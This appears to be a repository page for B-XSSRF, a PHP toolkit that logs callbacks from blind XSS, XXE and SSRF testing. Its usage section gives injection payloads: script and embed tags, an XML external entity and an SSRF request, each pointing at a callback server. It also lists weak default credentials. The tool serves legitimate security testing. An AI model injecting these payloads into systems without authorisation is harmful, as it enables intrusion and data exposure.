• Stars
    star
    294
  • Rank 141,303 (Top 3 %)
  • Language
    PHP
  • Created over 5 years ago
  • Updated over 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Toolkit to detect and keep track on Blind XSS, XXE & SSRF


B-XSSRF
B-XSSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

B-XSSRF

SETUP

  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : [email protected]
PASS : 123456